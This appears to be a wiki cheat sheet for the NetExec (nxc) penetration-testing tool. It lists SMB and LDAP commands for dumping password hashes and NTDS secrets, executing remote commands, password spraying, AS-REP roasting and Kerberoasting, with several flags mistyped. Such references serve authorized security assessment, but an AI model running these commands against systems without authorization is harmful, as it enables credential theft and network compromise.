NetExec
About
NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks. Usable for multiple protocols, such as smb, ssh, ldap, ftp, wmi, winrm, rdp, vnc, mssql, and nfs.
Links
Usage
Logging
nxc PROTOCOL IP -u 'USER' -p 'PASSWORD' --logSMB
General host info
nxc smb targets.txtEnumerate Users
nxc smb IP -u USER -p 'PASSWORD' --users
nxc smb IP -u USER -p 'PASSWORD' --users-export users.txtSee what AV/EDR is running
nxc smb IP -u USER -p 'PASSWORD' -M enum_avGenerate a list of relayable hosts (SMB Signing disabled)
nxc smb up-hosts.txt --gen-relay-list relay.txtEnumerate shares
nxc smb ip -u 'USER' -p 'PASSWORD' --sharesDumping hashes
nxc smb IP -u username -p password --sam
nxc smb IP -u username -p password --1sa
nxc smb IP -u username -p password -M lsassy
nxc smb IP -u username -p password --dpapi
nxc smb IP -u username -p password --ntds
nxc smb IP -u username -p password —-ntds —user AdministratorPass cmd
nxc smb ip -u 'USER' -p <passwordt> -x 'command'Pass powershell
nxc smb ip -u 'USER' -p 'PASSWORD' -X 'command'Look at domain admins
nxc smb ip -u 'USER' -p 'PASSWORD' -x 'net group "Domain Admins" /domain'Look at logged on users
nxc smb ip -u 'USER' -p 'PASSWORD' --loggedon-usersView password policy
nxc smb dc-ip -u 'USER' -p 'password' --pass-polEnumerate SMB Shares testing for anonymous access
nxc smb targets.txt --shares --no-bruteforcePerform a password spray
nxc smb IP -u users.txt -p 'Password123!' --continue-on-success
nxc smb IP -u users.txt -p passwords. txt --continue-on-success
nxc smb IP -u userl user2 user3 -p Summer18
nxc smb IP -u userl -p passwordl password2 password3
nxc smb IP -u user.txt -p user.txt —no-bruteforce --continue-on-success
nxc smb IP -u user.txt -p password.txt —-no-bruteforce —-continue-on-success
nxc smb IP -u user.txt -p password.txt —-no-bruteforce —-continue-on-success -d DELAY-#-IN-MINUTESLDAP
Check for misconfigured Delegation
nxc ldap IP -u username -p password --find-delegationMachine Account Quota - Created rogue machine account for escalation
nxc ldap IP -u username -p password -M maqEnumerate Users/Groups
nxc ldap IP -u username -p password --users
nxc ldap IP -u username -p password --active-users
nxc ldap IP -u username -p password --groups
nxc ldap IP -u username -p password --groups 'Domain Admins'Test if an Account Exists without Kerberos. When using the option -k or –use-kcache, you need to specify the same hostname (FQDN) as the one from the kerberos ticket
nxc ldap <ldap-server> -u "'USER'.txt" -p '' -kTest credentials
nxc ldap <ldap-server> -u 'USER' -p 'PASSWORD'With valid creds, Enumerate users
nxc ldap <ldap-server> -u 'USER' -p 'PASSWORD' –-usersASREPRoasting exploits accounts that do not require Kerberos pre-authentication to extract service ticket hashes, which can then be cracked offline.
nxc ldap <ldap-server> -u 'USER' -p '' --asreproast <output.txt>With a list of users
nxc ldap <ldap-server> -u users.txt -p '' --asreproast output.txtKerberoasting extracts service account hashes by requesting service tickets for accounts with SPNs (Service Principal Names).
nxc ldap <ldap-server> -u 'USER' -p 'PASSWORD' --kerberoasting hash.txtBloodHound ingestor is used to collect data for use in BloodHound, a tool for mapping AD attack paths.
nxc ldap <ldap-server> -u 'USER' -p 'PASSWORD' --bloodhound --collection All --dns-server <ldap-server>Last updated